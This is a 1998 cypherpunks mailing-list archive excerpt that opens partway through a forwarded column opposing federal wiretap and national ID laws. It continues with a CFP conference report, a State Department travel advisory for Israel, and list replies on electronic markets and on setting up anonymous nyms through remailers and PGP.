jurisdiction," says Russo, in the Brooklyn accent he has never shed. "So we
wouldn't have to go through the 9th District (Court of Appeals), like
anyone else. A governor can stop federal agents from coming into his state
to enforce these things; they need the permission of the individual county
sheriffs to try and enforce these laws within the state."

  I pointed out to Russo that skeptics will claim HR 4922 creates no actual
new wiretaps; it merely puts phone companies and others on notice that they
must wire their systems in such a way that federal agents can come in and
tap lines, if necessary, "pursuant to a court order or other lawful
authorization."

  "Then why, if it's only by court order the way it should be, does it say,
'or other lawful authorization'?" Russo asks, between bites of the corned
beef and pastrami. "That means any cop can request it," the same way your
bank account can now be frozen and levied with a mere letter from an IRS
agent -- no court order required.

  "Uri Dowbenko wrote a piece on this for the National Review; call him up."

  Russo obligingly supplied a copy of the federal law, which requires the
attorney general to tell congress how many "communication interceptions,
pen registers, and trap and trace devices" federal agents expect to need in
the next four years. A dutiful subordinate of Attorney General Janet Reno,
FBI Director "Louis Freeh has told Congress he needs money to tap 1.5
million phones simultaneously," Russo says.

  "The worst part of the federal ID card is not the card itself but what's
going to come out of it," candidate Russo adds, segueing without drawing a
breath into the other federal intervention that gets his goat. "The ID card
and the debit card merging; getting rid of cash. Everything will be on the
card. Every time you go buy something, they'll know what books you read,
what tapes you rent.

  "They'll debit your Social Security tax payments automatically. You'll
have no more cash. Cash will be gone; it will be illegal; you won't be able
to hide any more money in your mattress. And as Ross Perot pointed out, the
current Clinton budget will eventually mean an 82 percent tax rate" to
cover expanding welfare programs.

  "If they freeze your card, you can't buy food; you can't pay a lawyer. If
they can assume how much money a waitress should make in tips, and tax that
amount, then they can assume how much you make, and tax the amount they
assume you should be making. And at that point you're a slave. You are a
slave."


Digital fingerprinting

  Central in organizing resistance to the national ID card to which Russo
refers is the Coalition to Repeal the Fingerprint Law, at 5446 Peachtree
Industrial Boulevard, Suite 133, Atlanta, GA 30341, telephone 404-250-8105.

  The group's web site is at http://www.atlantainfoguide/repeal/.

  Posted there is an article by Cyndee Parker - self-described Georgia
"housewife turned activist, because no one else was doing anything about
it" - which begins: "In September of 1996, President Clinton signed into
law the Illegal Immigration Reform and Immigrant Responsibility Act of
1996. Buried at approximately page 650 of the new National Defense Bill,
also known as Public Law 104-208, Part B, Title IV, the American public was
given a national ID card. With no fanfare, no publicity and no scrutiny,
the bill easily avoided the watchful eyes of even its most aggressive
opponents. ...

  "In Section 401-403, pilot programs have been initiated by the U.S.
Attorney General, one of which is the 'Machine Readable Document Pilot
Program.' In this particular program, employers would have to 'procure' a
document reader linked to the federal government's Social Security
Administration in order to have the potential employee swipe their new
drive's license/national ID card through the reader. Then it would be up to
the federal government to either approve or disapprove the applicant for
employment. ...

  Additionally, Section 656 of the new law states that "after October 1,
2000, Federal agencies may only accept as proof of identity driver's
licenses that conform to standards developed by the Secretary of the
Treasury," after consultation with state motor vehicle officials and the
American Association of Motor Vehicle Administrators. "The AAMVA sees
digital fingerprinting as the best way to go in driver's license
identifiers," Ms. Parker reports.

  Parker quotes Dick Armey, R-Tex., calling the move "an abomination and
wholly at odds with the American tradition of individual freedom." Jack
Kemp told the New York Times this was "an anti-privacy, anti-business and
anti-American approach." Of course, Parker adds, "all this was said before
the bills were snuck through in the last defense bill. ... For the first
time in American history and reminiscent of Communist countries, our
government would have the ability to grant approval before a private
company enters into private employment contracts with private citizens,"
all justified as necessary to ban illegal immigrants from the workplace,
and to track down "deadbeat dads" delinquent on their child-support
payments.


Your number, please?

  A sister law is the Personal Responsibility and Work Opportunity
Reconciliation Act of 1996, now Public Law 104-193, approved by the
"Conservative Republican
Congress" on July 23, 1996, and signed into law by President Clinton on
Aug. 22, 1996.

  Public Law 104-193 requires that, as a condition for receipt of federal
"Child Support" and "Aid to Families With Dependent Children" funding, each
state must implement federally-defined citizen locating and tracking
measures, and specifically  authorizes the use of Social Security numbers
in a new biometric identity card ("biometric" referring to individualized
digital fingerprints, retinal scans, and so forth) for NON-drivers.

  Of special note in that bill are Section 313, the "State directory of new
hires," which Ms. Parker summarizes as "all new employees to be databased
with nationwide multiple agency sharing of personal information. ... felony
conspiracy charges for employers not reporting."

  Section 316, the "Expansion of the Federal Parent Locator Service" then
gives us "Employee assets and debts to be databased. Secretary of the
Treasury to have access to database."

  And that one's followed by Section 317, "Collection and use of Social
Security numbers for use in child support enforcement," which Ms. Parker
summarizes as "All applications for professional licenses, occupational,
drivers and marriage licenses to include Social Security numbers. Formerly
illegal as an invasion of privacy under the Privacy Act of 1974, USC Title
5, Section 552a."

  Uri Dowbenko did indeed look up all this stuff for his article in the
Oct. 13, 1997 National Review, as candidate Russo reported. And Dowbenko
confirms Cyndee Parker's reading of these laws, adding:

  "There is also a stipulation for the development of
'counterfeit-resistant Social Security cards,' implying the use of
biometric data like fingerprints and/or retinal scans. This is not sci-fi,
folks, it's the law."


'Resistance will spread'

  As Mr. Safire of the Times reports, several states have already moved to
comply with the new federal requirements -- some picking up federal "pilot
program" funding for their efforts.

  "The new driver's license requirement mandating fingerprints for Georgia
drivers and those wanting ID cards passed the state Legislature with
virtually no public or media attention in April of 1996," Cyndee Parker
reports from Atlanta. "The first known announcement was on the local
Atlanta news announcing an October 1996 date to begin fingerprinting."

  Since then, efforts to repeal the Georgia fingerprinting law have been
blocked by inspired procedural maneuvering on the part of the leadership of
the Georgia state Legislature.

  Bobby Franklin is a first-term member of the Georgia House of
Representatives from District 39, in Marietta. Marietta is in Cobb County,
home of Kennesaw, which recently and famously reacted to firearm bans
elsewhere by passing a law which requires every head of household to own a
gun.

  "And the crime rate immediately dropped, and stayed down, which you will
not see covered in the national news, because that's something they do not
want you to know," laughed Rep. Franklin when I reached him at his home on
a Monday night in early January.

  But I was calling Franklin about the fingerprint law.

  "They did that here back in '96, on the last day of the session. I was
not in the House then; I was elected in '96. So we tried last year to
repeal the measure. We had several bills that were introduced, we were
promised by the chairman of the committee that it would be let out so it
could be voted on by the whole house. ..."

  Needless to say, that did not happen.

  "The (state) Senate amended to remove the fingerprints, and we missed
upholding that by one vote.

  "I know in Alabama, their department of public safety said last year,
they just up and said, 'Hey guys, we're fingerprinting.' And there was such
a public outcry against it that the department backed down and they're not
fingerprinting. And we're very close to repealing, here. Our two major
Republican candidates for governor this year are both saying they will
issue an executive order banning our Motor Vehicle Department from
fingerprinting."

  At which point, won't they just substitute retinal scans, or something
else to meet the federal requirement, I ask Franklin. After all, no state
wants its residents cut off from all those fine, federal benefits as of the
year 2000.

  "Our draft legislation says they're not allowed to use (start
ital)any(end ital) biometric identifiers. We hope if we can block it in
Georgia it will spread, that we can prevent them from instituting their
program, that resistance will spread. No one wants to be chattel. If we're
treated like a number, we're property."

  Alabama "was basically a pilot program, from what I understood. They
threw out a trial balloon to see how it would go, and they got slammed, so
they backed away from it."

  On June 19, 1997, Congressman Bob Schaffer rose to the floor of the House
of Representatives in Washington, and read into the record Colorado Joint
House Resolution 97-1027 (passed unanimously in the state Senate, and by a
vote of 59-6 in the House): "Resolved ... that we, the members of the
Sixty-first General Assembly urge the Congress of the United States to
amend or repeal those specific provisions of the federal Personal
Responsibility and Work Opportunity Reconciliation Act of 1996 set forth in
this Resolution that place undue burden and expense upon the several
states, that violate provisions of the Constitution of the United States,
that impose insufficiently funded mandates upon the states in the
establishment, modification, and enforcement of child support obligations,
or that unjustifiably intrude into the personal lives of the law-abiding
citizens of the United States of America."

  Resistance IS spreading.


Vin Suprynowicz is the assistant editorial page editor of the Las Vegas
Review-Journal. His book, "Send in the Waco Killers," is due from
Huntington Press in May, 1998. Readers may contact him via e-mail at
vin@lvrj.com. The web site for the Suprynowicz column is at
http://www.nguworld.com/vindex/. The column is syndicated in the United
States and Canada via Mountain Media Syndications, P.O. Box 4422, Las Vegas
Nev. 89127.

***


Vin Suprynowicz,   vin@lvrj.com

"If ye love wealth greater than liberty, the tranquility of servitude
greater than the animating contest for freedom, go home from us in peace.
We seek not your counsel, nor your arms. Crouch down and lick the hand that
feeds you. May your chains set lightly upon you; and may posterity forget
that ye were our countrymen."    -- Samuel Adams

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/
Ask me about FC98 in Anguilla!: <http://www.fc98.ai/>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Sat, 21 Feb 1998 05:53:28 +0800
To: cypherpunks@toad.com
Subject: Report from CFP, from the Netly News (fwd)
Message-ID: <Pine.GSO.3.95.980220075212.12145B-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain





---------- Forwarded message ----------
Date: Fri, 20 Feb 1998 07:52:01 -0800 (PST)
From: Declan McCullagh <declan@well.com>
To: politech@vorlon.mit.edu
Subject: Report from CFP, from the Netly News


*****

http://cgi.pathfinder.com/netly/opinion/0,1042,1754,00.html

The Netly News Network (http://netlynews.com/)
February 20, 1998

Vive la Conference
by Declan McCullagh (declan@well.com)

       Richard Stallman is nothing if not determined. For over two
   decades this bristly MIT geek has championed an arcane cause: free
   computer programs. Stallman wants you to have the right to twiddle
   your software -- to be able to add features, rewrite it and, if you
   can figure out how, teach it get down and do the fandango. Last month
   Netscape endorsed Stallman's idea by deciding to open the lid to its
   software toolbox and encouraging any interested programmer to tinker
   with it.

       Yesterday Stallman won an award from the Electronic Frontier
   Foundation for his efforts, including writing the popular (and, of
   course, free) EMACS text editor. "I was trying to give people
   freedom," he said during the ceremony at the Computers, Freedom and
   Privacy (CFP) conference.

       Stallman is the type of fellow who frequents CFP, an annual event
   that brings together academics, government officials and Pilot-toting
   bitheads. Sparring is commonplace. Lawyers from the ACLU and the
   Center for Democracy and Technology shouted at each other yesterday
   morning when debating whether to cut deals on legislation in Congress.
   Former FTC commissioner Christine Varney said that the government
   should regulate corporations' privacy practices, and Solveig Singleton
   from the Cato Institute argued on a panel that the private sector
   should (not that I'm biased or anything). But the folks who trekked to
   Austin, Texas, this week generally share a common goal: preserving the
   unique culture of the Internet.

[...]







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Fri, 20 Feb 1998 22:20:03 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: NEW TRAVEL INFO -- Israel (fwd)
Message-ID: <199802201419.IAA23796@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:
>From owner-travel-advisories@stolaf.edu Fri Feb 20 04:04:45 1998
Date: Tue, 17 Feb 1998 11:07:49 -0500
From: owner-travel-advisories <owner-travel-advisories@stolaf.edu>
Subject: NEW TRAVEL INFO -- Israel
Sender: "U.S. Department of State" <76702.1202@compuserve.com>
To: travel-advisories@stolaf.edu
Message-ID: <199802171112_MC2-33A4-1596@compuserve.com>
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Precedence: bulk

STATE DEPARTMENT TRAVEL INFORMATION - Israel and the Occupied Territories
============================================================
Israel and the Occupied Territories  - Public Announcement
 February 14, 1998

 U.S. DEPARTMENT OF STATE
 Office of the Spokesman

The American Embassy in Tel Aviv and the U.S. Consulate General in 
Jerusalem are issuing the following Warden Message:

"This message supplements the Public Announcement issued by the 
U.S. Department of State on February 10, 1998 for the Middle East 
and South Asia.
 
The U.S. Embassy in Tel Aviv and Consulate General in Jerusalem 
continue to closely monitor the situation with Iraq. The U.S. 
Government believes there is a low probability of attack on Israel, 
the West Bank or Gaza, and that the possibility of Iraq using 
chemical and biological weapons (CBW) is remote, but cannot be 
excluded. American citizens are advised to avoid travel to the West 
Bank and Gaza and to exercise caution in Jerusalem, particularly in 
the area of the old city of Jerusalem.  The U.S. Consulate General 
in Jerusalem has suspended personal travel of its employees to the 
West Bank and has placed restrictions on official travel to the West 
Bank.  

These are precautionary measures only.  However, given the current 
tensions in the region, the U.S. Government believes it is important 
for all citizens to maintain readiness in the unlikely event of an 
emergency.

At this time, the Government of Israel is distributing protection 
kits to Israeli citizens and legal residents only. However, we 
understand that the government of Israel is putting in place 
arrangements to determine the most effective ways to distribute gas 
masks to foreign nationals and is in the process of acquiring 
adequate numbers of gas masks to provide for non-Israeli citizens in 
Israel, Jerusalem, and the areas of the West Bank under its control. 
 The Palestinian authority has informed the U.S. Government that it 
does not have protection kits to supply its population or foreign 
residents living within its areas of control.

For those American citizens who need to obtain a new passport or to 
update their registrations, passport hours at the Embassy (71 
Hayarkon Street, Tel Aviv) are Monday through Friday mornings from 
8:30 to 11:00 am and Wednesday afternoons from 1:30 to 3:30 pm; 
Consulate General in Jerusalem (27 Nablus Road, East Jerusalem) 
passport hours are Monday through Friday mornings from 8:30 to 
12:00, except for the last Friday of the month.

The Embassy and Consulate General urge all U.S. citizens to monitor 
local and international media for further developments.  Should the 
U.S. government need to issue advice to U.S. citizens, the Embassy 
and Consulate will notify the local media and activate our citizens 
warden network immediately.

U.S. citizens contemplating traveling to Israel, the West Bank and 
Gaza should take the above information into consideration and 
should, in addition, consult the latest Consular Information Sheet 
on Israel and the Occupied Territories dated December 23, 1997."

This Public Announcement expires on May 14, 1998.


Israel and the Occupied Territories - Consular Information Sheet
 December 23, 1997

(INCLUDING AREAS SUBJECT TO THE JURISDICTION OF THE PALESTINIAN 
INTERIM SELF-GOVERNMENT AUTHORITY)

Country Description:  The state of Israel is a parliamentary 
democracy with a modern economy.  Tourist facilities are widely 
available.  Israel occupied the West Bank, Gaza Strip, Golan 
Heights, and East Jerusalem as a result of the 1967 War.  Pursuant 
to negotiations between Israel and the Palestinians, an elected 
Palestinian authority now exercises jurisdiction in most of Gaza and 
most of the major cities of the West Bank.  Palestinian Authority 
police have responsibility for keeping order in those areas and the 
Palestinian Authority exercises a range of civil functions in other 
areas of the West Bank. Areas of Israeli and Palestinian Authority 
responsibilities and jurisdiction in the West Bank and Gaza are 
complex.  Definitive information on entry, customs requirements, 
arrests and other matters in the West Bank and Gaza may not be 
available and is subject to change without prior notice.

Embassy/Consulate Location and Sources of Assistance: The U.S. 
Embassy in Tel Aviv, Israel, is located at 71 Hayarkon Street. The 
U.S. mailing address is PSC 98, Box 0013, APO AE 09830.  The 
telephone number is (972) (3) 519-7575.  After hours number: 
519-7551.  The fax number is 972-3-516-0315.  The e-mail address is 
acs.amcit-telaviv@dos.us-state.gov.

The Consular Section of the U.S. Embassy should be contacted for 
information and help in the following areas:  Israel, the Gaza 
Strip, and ports of entry at Ben Gurion Airport, Haifa Port, and the 
northern (Jordan River) and southern (Arava) border crossings 
connecting Israel and Jordan.

The Consular Section of the U.S. Consulate General in Jerusalem is 
located at 27 Nablus Road. The U.S. mailing address is Unit 7228 Box 
0039, APO AE 09830. The telephone number is (972) (2) 625-3288 (via 
Israel)  the after hours number is 625-3201.  The fax number is 
972-2-272-2233.

The U.S. Consulate should be contacted for information and help in 
the following areas: west and east Jerusalem, the West Bank, and 
border crossings at the Allenby Bridge, connecting Jordan with the 
West Bank.

There is a U.S. Consular Agent in Haifa, at telephone (972) (04) 
853-1470, who reports to the Embassy in Tel Aviv.  The Consular 
Agent can provide routine and emergency services in the north.

Entry Requirements:

Israel:  Passports, an onward or return ticket, and proof of 
sufficient funds are required for entry.  A three-month visa may be 
issued for no charge upon arrival, and may be renewed.  Anyone who 
has been refused entry or experienced difficulties with his/her visa 
status during a previous visit, or who has overstayed a visa, can 
obtain information from the Israeli Embassy or nearest Israeli 
consulate regarding the advisability of attempting to return to 
Israel. Permission must be obtained from Israel for anyone 
attempting to claim the status of a returning resident.

Palestinian Authority:  Except during periods of closures, U.S. 
citizens, except those of Palestinian ancestry (see below) may enter 
and exit Gaza and the West Bank on a U.S. passport with an Israeli 
visa.  It is not necessary to obtain a visitor's permit from the 
Palestinian Authority.  Private vehicles frequently encounter long 
delays entering or leaving Gaza; and may also expect to be stopped 
at checkpoints entering or leaving the West Bank.

U.S. citizens who have ever held or now hold resident status in the 
West Bank or Gaza should be aware that they may be subject to the 
same travel regulations governing entry to and exit from Israel that 
affect all other resident Palestinians. In general, such individuals 
are required to hold a Palestinian passport to enter or depart Gaza 
or the West Bank via Israel.  U.S. citizen Palestinian residents 
arriving at Ben Gurion Airport without a Palestinian passport will 
be granted an entry visa to enable their transit to the West Bank or 
Gaza to obtain such documentation from the Palestinian Authority.  A 
Palestinian passport and permit to depart are required to leave via 
Ben Gurion Airport.  No permit is required for departure via the 
Rafah or Allenby border posts.

Palestinians who last departed Israel before the May 1994 Cairo 
Accords (regarding Gaza and Jericho) or the September 1995 Interim 
Agreement (regarding other areas of the West Bank) should re-enter 
Israel through the same port of entry from which they last left (and 
where their travel documents were then deposited).

Specific questions may be addressed to the nearest Israeli embassy 
or consulate.

Israel-Jordan Crossings:  International crossing points are now in 
operation between Israel and Jordan at Arava (Wadi al-'Arabah) 
crossing in the south and the Jordan River crossing (Sheikh Hussein 
Bridge) in the north.  Prior visas are not necessary for American 
citizens using these two crossing points, but travelers will have to 
pay a fee.  Visas should be obtained in advance for those wanting to 
cross the Allenby Bridge which links Jordan and the occupied West 
Bank.  (Note: Palestinian Americans with residency in the West Bank 
must cross into Jordan using the Allenby Bridge.)  Procedures for 
all crossings into Jordan are subject to frequent changes.  

For further entry information, travelers may contact the Israeli 
Embassy at 3514 International Dr., NW, Washington, DC. 20008, 
telephone (202) 364-5500, or the Israeli Consulate General in Los 
Angeles, San Francisco, Miami, Atlanta, Chicago, Boston, New York, 
Philadelphia, or Houston.

Customs Requirements:  Video cameras, among other items, must be 
declared upon entry to Israel and travelers carrying these items 
must go through the red zone at customs.  Definitive information on 
customs requirements for the Palestinian Authority is not available.

Security Measures:  Israel has strict security measures that may 
affect visitors.  Prolonged questioning and detailed searches may 
take place at the time of entry and/or departure at all points of 
entry to Israel, including entry from any of the areas under 
Palestinian jurisdiction.  American citizens with Arab surnames may 
expect close scrutiny at Ben Gurion Airport and the Allenby Bridge 
from Jordan.  For security reasons, delays or obstacles in bringing 
in or departing with cameras or electronics equipment are not 
unusual.  During searches and questioning, access may be denied to 
U.S. consular officers, lawyers, or family members.  Definitive 
information on security measures in the Palestinian Authority is not 
available.

Terrorism/Security:  Although they have not been specifically 
targeted for attack, U.S. citizens have been killed in past 
terrorist actions in Israel, the West Bank, and Gaza.   The most 
recent attacks have been in highly frequented shopping and 
pedestrian areas, and public buses. U.S. citizens should use caution 
in crowded pedestrian and shopping areas.   In addition, the U.S. 
Embassy and the Consulate General have warned their employees and 
American citizens to avoid travel on public buses, as well as 
congregating at bus stops and other crowded areas.  This restriction 
does not apply to tour buses.

U.S. citizens should, at all times, avoid large crowds and 
political demonstrations, and not remain in an area where a 
demonstration or altercation appears to be developing.  Such 
gatherings can occur spontaneously, and have the potential to become 
violent without warning.

Areas of Instability -

West Bank and Gaza:  During periods of unrest, the West Bank and 
Gaza are sometimes closed off by the Israeli government.  Travel 
restrictions may be imposed with little or no warning. Strict 
measures have frequently been imposed following terrorist actions.  
In such circumstances,  movement of Palestinians (including 
Palestinian Americans) and foreign passport holders has been 
severely impaired.

Demonstrations by Palestinians and Israelis in the West Bank have 
led to confrontations and clashes with the police, with some turning 
deadly.  Stone throwing and other forms of protest can occur without 
warning and can escalate quickly.

In view of the continued potential for violence and unrest in the 
West Bank and Gaza, the State Department advises all American 
citizens to avoid travel to these areas, except for daylight visits 
to Bethlehem, Jericho, Highway 1 from Jerusalem to the Dead Sea, 
Route 90 through the Jordan Valley, and tourist sites along these 
routes. Accessible sites for daylight visits include the Inn of the 
Samaritan, Nebi Musa, St. George's Monastery, Mount of Temptation 
Monastery, Qumran, and Qualiah Water Park.  The Consular Section of 
the U.S. Consulate General, located at 27 Nablus Road in East 
Jerusalem, is safe and accessible to all visitors.

The U.S. government maintains tight security procedures regarding 
travel of U.S. government employees, officials, and dependents to 
the Gaza Strip and the West Bank.  Frequently, U.S. government 
employees are instructed not to travel at all to these areas.  
Travel guidelines for U.S. government employees may change at any 
time.

The Palestinian police force has been established in Gaza and the 
major cities of the West Bank which are under Palestinian 
jurisdiction.  Joint Israeli/Palestinian police patrols and 
checkpoints may be encountered.  Many Israeli and Palestinian 
civilians in Gaza and the West Bank possess their own guns.

General Precautions:  Travel on strike days or after dark is not 
recommended.  Tourists using public transportation or traveling by 
car in areas less frequented by tourists are at risk.  Vehicles have 
been damaged, with rental cars in particular being targeted.

Jerusalem:  In Jerusalem, travelers can reduce their risk of being 
involved in violent incidents by traveling in groups, avoiding the 
old city at night, except for the Jewish quarter, and exercising 
caution at religious sites on holy days, Fridays, and Saturdays.  
Most roads into ultra-orthodox Jewish neighborhoods are blocked off 
on Saturdays.  Assaults on secular visitors, either for being in 
cars or for being "immodestly dressed," have been known to occur in 
these neighborhoods.

In the North:  In the Golan Heights, there are live land mines in 
many areas, and some minefields have not been clearly marked or 
fenced.  Visitors who walk only on established roads or trails will 
reduce the risk of injury from mines.  Rocket attacks from Lebanese 
territory can occur without warning close to the northern border of 
Israel.

Driving and Road Conditions:  There is a high rate of fatalities 
relating to auto accidents, and drivers should use caution.  While 
the roads in Israel are well built, the roads in Gaza and most of 
the West Bank are of poor quality.

Arrests and Detention:  U.S. citizens arrested by the Israeli 
National Police (INP) and charged with crimes are entitled to legal 
representation and consular notification and visitation.  Typically 
the INP notifies the Embassy or Consulate General within two days of 
arrest, and consular access is normally granted within four days.  
This procedure may be expedited if the arrested American shows a 
U.S. passport to the police as proof of U.S. citizenship, or asks 
for access to the Embassy or Consulate General.

U.S. citizens arrested in the West Bank for criminal offenses may 
be prevented from communicating with lawyers, family members, or 
consular officers. The U.S. Consulate General is often not notified 
of the arrest, or notified in a timely manner.  Consular access to 
the arrestees can be initially denied and is frequently delayed.

In contrast to persons arrested for criminal offenses, U.S. 
citizens arrested or detained in Israel and the West Bank on 
suspicion of security offenses often are not permitted to 
communicate with consular officials, lawyers, or family members in a 
timely manner during the interrogation period of their case.  They 
may be detained for up to six months at a time without charges.  
Youths over the age of fourteen have been detained and tried as 
adults.  Neither the Embassy nor the Consulate are normally notified 
of the arrests of Americans in the West Bank by Israeli authorities, 
and access to detainees is frequently delayed.  Notification may be 
more rapid if the detained American shows a U.S. passport as proof 
of citizenship and asks the local authorities to contact the Embassy 
or Consulate General.

Medical Facilities:  Modern medical care and medicines are 
available in Israel.  However, some hospitals in Israel and most 
hospitals in the Gaza Strip and the West Bank fall below U.S. 
standards.  Travelers can find information in English about 
emergency medical facilities and after-hours pharmacies in the 
"Jerusalem Post" newspaper.  Doctors and hospitals often expect 
immediate cash payment for health services.  U.S. medical insurance 
is not always valid outside the united states.  Supplemental medical 
insurance with specific overseas coverage has proven useful.  The 
Internet site at the Centers for Disease Control and Prevention 
(http://www.cdc.gov) has additional health information. Travelers 
from regions where contagious diseases are prevalent may need to 
show shot records before entry into Israel.

Information on Crime:  The crime rate is moderate in Israel, the 
Gaza Strip, and the West Bank.  The loss or theft of a U.S. passport 
abroad should be reported immediately to local police and the 
nearest U.S. embassy or consulate.  Useful information on 
safeguarding valuables, protecting personal security, and other 
matters is provided in the Department of State pamphlets, "A Safe 
Trip Abroad" and "Tips for Travelers to the Middle East and North 
Africa," available from the Superintendent of Documents, U.S. 
Government Printing Office, Washington, DC. 20402.

Drug Penalties:  U.S. citizens are subject to the laws of the 
territory in which they are traveling.  Penalties for possession, 
use or trafficking in illegal drugs are severe in Israel, and 
convicted offenders can expect jail sentences and fines.  The 
Palestinian Authority also has strict penalties for drug use by 
persons under its jurisdiction.

Court Jurisdiction:  Under Israel's judicial system, the rabbinical 
courts exercise jurisdiction over all Jewish citizens and residents 
of Israel in cases of marriage and divorce and related issues, such 
as support and child custody.  Rabbinical courts can also impose 
sanctions, including jail terms and restrictions against leaving the 
country, on individuals married in a Jewish religious ceremony who, 
in case of divorce, refuse to give their spouses a religious divorce 
("get").  In some cases, Jewish Americans, who entered Israel as 
tourists, have become defendants in divorce cases filed against them 
in a rabbinical court in Israel by their American spouses who are 
seeking a religious divorce that the defendants have refused to 
give.  These Americans have been detained in Israel for prolonged 
periods while the Israeli courts consider whether such individuals 
have sufficient ties to Israel to establish rabbinical court 
jurisdiction.  In one case, the rabbinical courts detained in Israel 
a Jewish American tourist who had been sued for support by his 
spouse in the United States.  Jewish American visitors should be 
aware that they may be subject to involuntary and prolonged stays in 
Israel if a case is filed against them in a rabbinical court.  This 
may occur even when the marriage took place in the U.S., and/or the 
spouse seeking relief is not present in Israel.  

Dual Nationality:  Israeli citizens naturalized in the United 
States retain their Israeli citizenship, and their children are 
considered Israeli citizens as well.  In addition, children born in 
the United States to Israeli parents acquire both U.S. and Israeli 
nationality at birth.  Israeli citizens, including dual nationals, 
are subject to Israeli laws requiring service in Israel's armed 
forces.  U.S.-Israeli dual nationals of military age who do not wish 
to serve in the Israeli armed forces may contact the Israeli Embassy 
to obtain proof of exemption or deferment from Israeli military 
service before going to Israel.  Otherwise, they may not be able to 
leave the country without doing military service.  Israeli citizens, 
including dual nationals, must enter and depart Israel on their 
Israeli passports.  (Note:  U.S.-Israeli dual citizens must enter 
and depart the U.S. on their U.S. passports.)

Palestinian-American citizens with residency rights in Gaza or the 
West Bank are subject to the same regulations as other resident 
Palestinians.  This normally requires them to depart these areas 
with Palestinian travel documents or (for residents of Jerusalem) 
laissez-passers with re-entry permits approved by the Israeli 
Ministry of Interior.

Registration:  The State Department advises American citizens who 
plan to be in the region for a substantial period of time to 
register at the U.S. Embassy in Tel Aviv or the U.S. Consulate 
General in Jerusalem.  When registering, U.S. citizens can obtain 
updated information on travel and security in the area.

 No. 97-169

This replaces the Consular Information Sheet dated January 22, 
1997, to provide new information about travel documentation for 
Palestinian Americans, and to update the sections on entry/exit 
requirements, terrorism and security, and arrest and detentions.

----- ----- ----- ----- ----- ----- ----- ----- ----- ----- ----- ----- -----
The "travel-advisories@stolaf.edu" mailing list is the official Internet and
BITNET distribution point for the U.S. State Department Travel Warnings and
Consular Information Sheets.  To unsubscribe, send a message containing the
word "unsubscribe" to:	travel-advisories-request@stolaf.edu

Archives of past "travel-advisories" postings are available at the URL:
"http://www.stolaf.edu/network/travel-advisories.html" or via Gopher:
gopher.stolaf.edu, Internet Resources/US-State-Department-Travel-Advisories





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Sat, 21 Feb 1998 12:40:27 +0800
To: Robert Hettinga <cypherpunks@cyberpass.net
Subject: Re: A Geodesic Society?
In-Reply-To: <v04003a0cb1134f20d60d@[139.167.130.248]>
Message-ID: <3.0.5.32.19980220091102.008dd590@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



At 10:18 AM 2/20/98 -0500, Robert Hettinga wrote:
>The following is something I wrote for a private online conference
>sponsored by Nikkei, the Japanese financial news organization. Since
>they're supposedly combing the list for quotable bon mots, I may end up in
>the Japanese papers. :-).
Heh - West Coast Cypherpunks end up on Japanese TV :-)

Good article.  If you're trying to emphasize the financial stuff, 
moving it up to the beginning would help, but I don't know the audience 
you wrote it for.  A few nitpicks:

>Okay. Now let's look at the future, shall we? Oddly enough, the "future"
>starts with the grant of telephone monopoly to AT&T in the 1920's in
>exchange for universal telephone service. When AT&T figured out that a
>majority of people would have to be telephone operators for that to happen,
>it started to automate switching, from electricomechanical, to electronic
>(the transistor was invented at Ball Labs, remember), to, finally,
>semiconducting microprocessors.  

_Bell_ Labs, and BTW they developed one of the first 8-bit microprocessors;
the MAC-8 was used for building telephone things back in late 4004 days.
However, the Electro-Mechanical telephone switch was Not Invented Here -
Strowger developed it to protect privacy and increase reliability
(he suspected that a competitor had bribed the telephone operator to
connect customers to the competitor's business instead of Strowger's.)
He offered it for sale to the Bell Telephone Companies, who were too
clueless to see the economics and buy it; they caught on a few years later,
and had to pay tons of money to the competitor who'd licensed the patent. 

> But, what, you ask, do I do when someone defrauds me? .....
> In a geodesic market, if someone commits fraud, everyone knows it. 
> Instantly. And, something much worse than incarceration happens to
> that person. That person's reputation "capital" disappears. 

The difficulty, of course, is that geodesic markets with bearer 
instruments make it easy to do business anonymously - so everyone
may know that fraud was committed, but not know who committed it.
(Like the US political excuse "Mistakes were made".)
The lack of need for accounts and reputation capital is part of what
makes geodesic markets financially advantageous.  On the other hand,
reconciling these differences is complex enough that cryptographers
and financial folks can make big bucks getting it right :-)
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Sat, 21 Feb 1998 12:39:59 +0800
To: cypherpunks@cyberpass.net
Subject: Re: your mail
In-Reply-To: <241e4ef7f128aa790d464cb6e45d4dd2@anon.efga.org>
Message-ID: <3.0.5.32.19980220091731.008ddc00@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>> In case my last message doesn't get through,
>> I'm looking for info on how one can create and
>> use a persistent Nym. I looked and can't find
>> info on how to do this anywhere (besides the
>> creation of a "free" email account somewhere).
>> Can any cypherpunks help?

Cypherpunks have discussed this intensely;
ask AltaVista where to find "nymserver"s and
"encrypted reply block"s.

The Anonymous Remailer List claims to be at
http://www.cs.berkeley.edu/~raph/remailer-list.html
(though it might be on publius.net these days), and has some
pointers to starting places.

Private Idaho is a convenient user-interface tool for crypto
and remailers, and really simplified setting up and using some
of the early servers.

Another approach is to create a PGP key for your nym
(or a Crypto Kong key), always sign your postings,
and use anonymous remailers for sending mail,
and either read replies on the cypherpunks list
or on some broadcast medium like alt.anonymous.messages.
				Thanks! 
					Bill
